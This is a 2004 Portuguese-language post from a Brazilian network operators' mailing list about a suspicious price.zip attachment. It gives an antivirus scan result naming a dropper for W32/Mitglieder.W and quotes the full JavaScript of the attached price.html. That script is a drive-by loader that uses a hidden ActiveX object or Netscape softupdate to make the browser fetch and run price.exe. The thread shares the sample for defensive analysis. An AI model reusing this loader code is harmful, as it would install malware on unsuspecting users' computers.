Re: [GTER] Problemas com possível vírus
Wyvern
wyvern at terra.com.br
Mon Aug 9 16:42:31 -03 2004
/var/inflex/tmp/inf_0809163818466/unpacked/_headers_
/var/inflex/tmp/inf_0809163818466/unpacked/textfile0
/var/inflex/tmp/inf_0809163818466/unpacked/textfile1
/var/inflex/tmp/inf_0809163818466/unpacked/price.zip->price.html Infection:
HTML/ObjData at exp
/var/inflex/tmp/inf_0809163818466/unpacked/price.zip->price/price.exe is a
dropper for W32/Mitglieder.W
/var/inflex/tmp/inf_0809163818466/unpacked/textfile2
----- Original Message -----
From: "Fabiano" <fabiano.br at uol.com.br>
To: "Grupo de Trabalho de Engenharia e Operacao de Redes"
<gter at eng.registro.br>
Sent: Monday, August 09, 2004 4:37 PM
Subject: Re: [GTER] Problemas com possível vírus
AVG atualizado não detectou (enviado amostra...)
segue código do price.zip que é na verdade uma pasta "teste/price.exe" + um
price.html
[]s
Fabiano
-----INICIO DO
.HTML---------------------------------------------------------------------
<head>
<script language="JavaScript">
var exepath='price/price.exe';
</script>
<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
sewre = "rseI";
var bver=parseInt(navigator.appVersion);
function install() {
if ( navigator.platform && navigator.platform != 'Win32' ) {
location.replace('NOTWIN32WARNING.html');
return;
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
document.write('<object id="gib" width=1 height=1
classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D"
codebase="'+exepath+'"></object>');
} else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
trigger.StartSoftwareUpdate(exepath,
trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}
install();
// -->
</script>
</head>
---FIM----------------------------------------------------------------------
------------------
--
GTER list https://eng.registro.br/mailman/listinfo/gter
Esta mensagem foi verificada pelo E-mail Protegido Terra.
Scan engine: VirusScan / Atualizado em 04/08/2004 / Versão: 1.5.2
Proteja o seu e-mail Terra: http://www.emailprotegido.terra.com.br/
More information about the gter
mailing list